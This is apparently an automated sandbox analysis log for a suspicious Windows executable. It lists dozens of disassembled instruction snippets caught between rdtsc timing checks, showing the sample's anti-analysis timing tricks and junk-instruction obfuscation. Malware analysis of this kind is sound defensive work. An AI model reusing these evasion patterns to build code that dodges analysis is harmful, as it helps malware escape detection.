Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90732 second address: D90741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD728Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90741 second address: D90792 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95558h 0x00000008 jmp 00007FFBBCD95552h 0x0000000d jmp 00007FFBBCD95554h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FFBBCD95546h 0x0000001d jmp 00007FFBBCD95558h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90931 second address: D9094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD7296h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90C4C second address: D90C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90C50 second address: D90C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D912CA second address: D912FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95558h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FFBBCD95557h 0x00000013 jmp 00007FFBBCD9554Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D912FD second address: D91301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D91301 second address: D91335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFBBCD95558h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D96825 second address: D9682C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9682C second address: D9683E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66841 second address: D66845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66845 second address: D45117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub ch, 00000032h 0x0000000d mov edi, dword ptr [ebp+122D31DFh] 0x00000013 lea eax, dword ptr [ebp+12488577h] 0x00000019 jnl 00007FFBBCD9554Ch 0x0000001f mov edx, dword ptr [ebp+122D29C9h] 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FFBBCD95558h 0x0000002d jmp 00007FFBBCD95553h 0x00000032 popad 0x00000033 jmp 00007FFBBCD95550h 0x00000038 popad 0x00000039 mov dword ptr [esp], eax 0x0000003c mov edx, ebx 0x0000003e call dword ptr [ebp+1245F295h] 0x00000044 jo 00007FFBBCD9557Fh 0x0000004a jmp 00007FFBBCD9554Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FFBBCD95550h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F35 second address: D66F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F3A second address: D66F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jne 00007FFBBCD9554Ch 0x00000011 and edi, dword ptr [ebp+12451154h] 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FFBBCD9554Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D670F4 second address: D670F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D670F8 second address: D6710D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFBBCD95548h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6710D second address: D67111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67531 second address: D67566 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FFBBCD95554h 0x00000010 push 0000001Eh 0x00000012 nop 0x00000013 push ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007FFBBCD95546h 0x0000001d popad 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67566 second address: D67578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCAD728Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67700 second address: D6770A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6770A second address: D6770E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678B7 second address: D678BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678BD second address: D678D0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBBCAD7288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678D0 second address: D678D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678D5 second address: D678EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBBCAD7286h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678EB second address: D67900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67900 second address: D6795A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jmp 00007FFBBCAD7299h 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push edx 0x0000001d jmp 00007FFBBCAD7291h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jng 00007FFBBCAD7286h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67A20 second address: D67A2A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBBCD9554Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AE2 second address: D67AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AEB second address: D67AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AF1 second address: D67B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FFBBCAD728Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67B01 second address: D45BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FFBBCD95548h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call dword ptr [ebp+12453D8Dh] 0x0000002c push eax 0x0000002d jnc 00007FFBBCD95548h 0x00000033 pushad 0x00000034 jno 00007FFBBCD95546h 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D959B2 second address: D959B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B43 second address: D95B53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FFBBCD95546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B53 second address: D95B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B57 second address: D95B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFBBCD95552h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBBCD9554Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B81 second address: D95BA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7290h 0x00000007 pushad 0x00000008 jo 00007FFBBCAD7286h 0x0000000e jc 00007FFBBCAD7286h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F5C second address: D66F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95F26 second address: D95F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D960C8 second address: D960D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3B8 second address: D9B3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3BE second address: D9B3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3C3 second address: D9B3C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9FB08 second address: D9FB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007FFBBCD95546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFBBCD95551h 0x00000012 jnl 00007FFBBCD95546h 0x00000018 jg 00007FFBBCD95546h 0x0000001e jmp 00007FFBBCD9554Eh 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FFBBCD9554Eh 0x0000002d push edx 0x0000002e pop edx 0x0000002f ja 00007FFBBCD95546h 0x00000035 push esi 0x00000036 jnp 00007FFBBCD95546h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9FB5B second address: D9FB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA02B9 second address: DA02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA02BF second address: DA02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA0551 second address: DA0585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFBBCD9554Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBBCD9554Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA0585 second address: DA0589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA072C second address: DA0730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA08BF second address: DA08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FFBBCAD7292h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFBBCAD728Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA0BDF second address: DA0BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA1016 second address: DA101B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA101B second address: DA1039 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FFBBCD95559h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9F823 second address: D9F837 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FFBBCAD7286h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA9F45 second address: DA9F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95557h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA8DAD second address: DA8DC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ah 0x00000007 jno 00007FFBBCAD7288h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA8DC9 second address: DA8DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA8DCD second address: DA8DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBBCAD7294h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA983D second address: DA9841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA9841 second address: DA9847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA9847 second address: DA984C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA9C7C second address: DA9C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DACDCA second address: DACDFF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBBCD95548h 0x00000008 jmp 00007FFBBCD95552h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 jg 00007FFBBCD95546h 0x0000001c pop esi 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DACDFF second address: DACE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DAFAE0 second address: DAFAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB3804 second address: DB3824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB945D second address: DB9464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB9873 second address: DB9898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBBCAD7286h 0x0000000a jmp 00007FFBBCAD7296h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB9898 second address: DB989C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D673A3 second address: D67422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FFBBCAD7288h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+124885B6h] 0x00000029 add cx, 40AEh 0x0000002e add eax, ebx 0x00000030 mov dword ptr [ebp+122D30F0h], edi 0x00000036 push eax 0x00000037 jmp 00007FFBBCAD7292h 0x0000003c mov dword ptr [esp], eax 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FFBBCAD7288h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 clc 0x0000005a push 00000004h 0x0000005c mov dword ptr [ebp+12452C3Dh], esi 0x00000062 nop 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 pop esi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67422 second address: D67443 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBBCD95550h 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FFBBCD95546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB9DBE second address: DB9DC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB9DC5 second address: DB9DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBBCD95558h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DB9DE7 second address: DB9E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBBCAD7297h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBBCAD7294h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DBE148 second address: DBE150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DBE150 second address: DBE154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DBE154 second address: DBE158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DBE286 second address: DBE291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFBBCAD7286h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DBE291 second address: DBE2BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBBCD95548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FFBBCD95566h 0x00000010 jnl 00007FFBBCD95556h 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC73BC second address: DC73C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFBBCAD7286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC73C6 second address: DC73DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95550h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC73DA second address: DC73E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC73E4 second address: DC7402 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FFBBCD95559h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC7402 second address: DC740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FFBBCAD7286h 0x0000000d rdtsc
